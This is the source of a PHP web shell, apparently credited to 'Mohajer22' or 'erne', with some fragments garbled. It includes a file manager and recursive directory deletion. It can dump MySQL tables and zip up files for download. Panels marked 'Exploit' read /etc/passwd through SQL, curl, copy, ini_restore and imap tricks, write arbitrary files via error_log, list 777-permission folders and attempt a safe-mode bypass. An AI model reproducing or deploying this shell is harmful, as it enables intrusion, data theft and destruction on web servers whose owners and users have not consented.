DIRFirst dataLast dataSizePerm"; $dirs=@opendir($dir); $dir_i = '0'; while ($file=@readdir($dirs)) { $filepath="$dir/$file"; $a=@is_dir($filepath); if($a=="1"){ if($file!=".." && $file!=".") { $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); $dirperm=substr(base_convert(fileperms($filepath),10,8),-4); echo " \n"; echo " $file]\n"; echo " $ctime\n"; echo " $mtime\n"; echo " <dir>\n"; echo " $dirperm\n"; echo "\n"; $dir_i++; } else { if($file=="..") { echo " \n"; echo " Up dir\n"; echo "\n"; } } } }// while @closedir($dirs); echo" "; $dirs=@opendir($dir); $file_i = '0'; while ($file=@readdir($dirs)) { $filepath="$dir/$file"; $a=@is_dir($filepath); if($a=="0"){ $size=@filesize($filepath); $size=$size/1024 ; $size= @number_format($size, 3); if (@filectime($filepath) == @filemtime($filepath)) { $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); } else { $ctime="".@date("Y-m-d H:i:s",@filectime($filepath)).""; $mtime="".@date("Y-m-d H:i:s",@filemtime($filepath)).""; } @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); echo " \n"; echo " $file\n"; if ($file == 'config.php') { echo "$file\n"; } echo " $ctime\n"; echo " $mtime\n"; echo " $size KB\n"; echo " $fileperm\n"; echo "\n"; $file_i++; } }// while @closedir($dirs); echo "\n"; echo "\n"; }// end dir function debuginfo() { global $starttime; $mtime = explode(' ', microtime()); $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); echo "Processed in $totaltime second(s)"; } function stripslashes_array(&$array) { while(list($key,$var) = each($array)) { if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) { if (is_string($var)) { $array[$key] = stripslashes($var); } if (is_array($var)) { $array[$key] = stripslashes_array($var); } } } return $array; } function deltree($deldir) { $mydir=@dir($deldir); while($file=$mydir->read()) { if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { @chmod("$deldir/$file",0777); deltree("$deldir/$file"); } if (is_file("$deldir/$file")) { @chmod("$deldir/$file",0777); @unlink("$deldir/$file"); } } $mydir->close(); @chmod("$deldir",0777); return (@rmdir($deldir)) ? 1 : 0; } function dir_writeable($dir) { if (!is_dir($dir)) { @mkdir($dir, 0777); } if(is_dir($dir)) { if ($fp = @fopen("$dir/test.txt", 'w')) { @fclose($fp); @unlink("$dir/test.txt"); $writeable = 1; } else { $writeable = 0; } } return $writeable; } function getrowbg() { global $bgcounter; if ($bgcounter++%2==0) { return "firstalt"; } else { return "secondalt"; } } function getPath($mainpath, $relativepath) { global $dir; $mainpath_info = explode('/', $mainpath); $relativepath_info = explode('/', $relativepath); $relativepath_info_count = count($relativepath_info); for ($i=0; $i<$relativepath_info_count; $i++) { if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; if ($relativepath_info[$i] == '..') { $mainpath_info_count = count($mainpath_info); unset($mainpath_info[$mainpath_info_count-1]); continue; } $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; } return implode('/', $mainpath_info); } function getphpcfg($varname) { switch($result = get_cfg_var($varname)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } function getfun($funName) { return (false !== function_exists($funName)) ? "Yes" : "No"; } class PHPZip{ var $out=''; function PHPZip($dir) { if (@function_exists('gzcompress')) { $curdir = getcwd(); if (is_array($dir)) $filelist = $dir; else{ $filelist=$this -> GetFileList($dir);// ћ ”С?СЋ ? В± Ѕ foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); } if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); else chdir($curdir); if (count($filelist)>0){ foreach($filelist as $filename){ if (is_file($filename)){ $fd = fopen ($filename, "r"); $content = @fread ($fd, filesize ($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($filename); $this -> addFile($content, $filename); } } $this->out = $this -> file(); chdir($curdir); } return 1; } else return 0; } function GetFileList($dir){ static $a; if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if($file!='.' && $file!='..'){ $f=$dir .'/'. $file; if(is_dir($f)) $this->GetFileList($f); $a[]=$f; } } closedir($dh); } } return $a; } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } // end if return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } function sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1; $fields = mysql_query("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",\n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } mysql_free_result($fields); $keys = mysql_query("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } mysql_free_result($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY ($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "\n);\n\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = mysql_query("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter<$numfields) { if (!$firstfield) { $tabledump.=", "; } else { $firstfield=0; } if (!isset($row[$fieldcounter])) { $tabledump .= "NULL"; } else { $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; } } $tabledump .= ");\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } } mysql_free_result($rows); } class FORMS { function tableheader() { echo "
 
Об игре
События
Арт






 
\n"; } function headerform($arg=array()) { global $dir; if ($arg[enctype]){ $enctype="enctype=\"$arg[enctype]\""; } else { $enctype=""; } if (!isset($arg[method])) { $arg[method] = "POST"; } if (!isset($arg[action])) { $arg[action] = ''; } echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; } function tdheader($title) { global $dir; echo " \n"; echo " \n"; echo " \n"; } function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { if ($bgcolor=='2') { $css="secondalt"; } elseif ($bgcolor=='1') { $css="firstalt"; } else { $css=$bgcolor; } $height = empty($height) ? "" : " height=".$height; $colspan = empty($colspan) ? "" : " colspan=".$colspan; echo " \n"; echo " \n"; echo " \n"; } function tablefooter() { echo "
".$arg[content]."
".$title." [В·mohajer]
".$content."
\n"; } function formheader($action='',$title,$target='') { global $dir; $target = empty($target) ? "" : " target=\"".$target."\""; echo "
\n"; echo " \n"; echo " ".$title." [·µ» Ё]\n"; echo " \n"; } function makehidden($name,$value=''){ echo " \n"; } function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){ $css = ($css == 'input') ? " class=\"input\"" : ""; $input = " \n"; return $input; } function makeid($name,$value='',$extra='',$type='select',$size='30',$css='input'){ $css = ($css == 'input') ? " class=\"input\"" : ""; $input = " "; return $input; } function makeimp($name,$value='',$extra='',$type='select',$size='30',$css='input'){ $css = ($css == 'input') ? " class=\"input\"" : ""; $input = " "; return $input; } function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){ $textarea = " \n"; return $textarea; } function formfooter($over='',$height=''){ $height = empty($height) ? "" : " height=\"".$height."\""; echo " \n"; echo " \n"; echo " \n"; echo "
\n"; echo $end = empty($over) ? "" : "\n"; } function makeselect($arg = array()){ if ($arg[multiple]==1) { $multiple = " multiple"; if ($arg[size]>0) { $size = "size=$arg[size]"; } } if ($arg[css]==0) { $css = "class=\"input\""; } $select = " \n"; return $select; } } $tb->tableheader(); $tb->tdbody('
Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR
','center','top'); $tb->tdbody('
'); $tb->headerform(array('content'=>'read file :
' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit'))); $tb->headerform(array('content'=>'read file id:
' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit'))); $tb->headerform(array('content'=>'read file CURL:
' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit'))); $tb->headerform(array('content'=>'read file copy:
' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit'))); $tb->headerform(array('content'=>'read file ini_restore:
' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit'))); $tb->headerform(array('content'=>'read file or dir with imap:
' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit'))); $tb->headerform(array('content'=>'Make file ERORR:
' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit'))); // read file SQL ( ) // if(empty($_POST['Mohajer22'])){ } else { echo "read file SQL","
" ; echo " "; } // ERORR // if(empty($_POST['ER'])){ } else { $ERORR=$_POST['ER']; echo error_log("
By erne
", 3,$ERORR); } // id // if ($_POST['plugin'] ){ echo "read file id" ,"
"; echo " "; break; } // CURL // if(empty($_POST['curl'])){ } else { echo "read file CURL","
" ; echo " "; } // copy// $u1p=""; $tymczas=""; if(empty($_POST['copy'])){ } else { echo "read file copy" ,"
"; echo " "; } else { die("
Sorry... File ".htmlspecialchars($u1p)." dosen't exists or you don't have access.
"); } } /// ini_restore // if(empty($_POST['M2'])){ } else { echo "read file ini_restore","
"; echo " "; } // imap // $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { echo "read file imap" ,"
"; echo " "; } elseif ($string && $switch == "dir") { echo "read dir imap","
" ; echo " "; } $tb->tdbody ("
"); // open dir // $tb->tableheader(); $tb->tdbody('
Exploit: Open dir
','center','top'); $tb->tdbody('
'); if(empty($_POST['m'])){ echo "
path dir
"; } else { $m=$_POST['m']; $spath = $m ; $path = $m ; $method = intval(trim($_POST['method'])); $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file = readdir($handle))) { $full_path = "$path/$file"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0777')) { if (!file_exists('.*')) { $_folders[$i] = $file; $i++; } } } closedir($handle); clearstatcache(); echo 'The folders is 777 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0755')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 755 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0644')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 644 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0750')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 750 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0604')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 604 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0705')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 705 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0606')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 606 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0703')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 703 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } } $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); $_folders[$i] = $file1; $i++; } clearstatcache(); echo 'www.ernealizm.us :
'; foreach ($_folders as $folder) { echo $folder.'
'; } echo 'www.hack-medya.org: '.$i.'
'; $tb->tdbody ("
"); $tb->tableheader(); $tb->tdbody('
Exploit: break fucking safe-mode
','center','top'); $tb->tdbody('
'); error_reporting(E_WARNING); ini_set("display_errors", 1); echo ""; echo "
"; echo "
Root directory:
"; echo "
"; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); echo " "; $tb->tdbody ("
"); ?>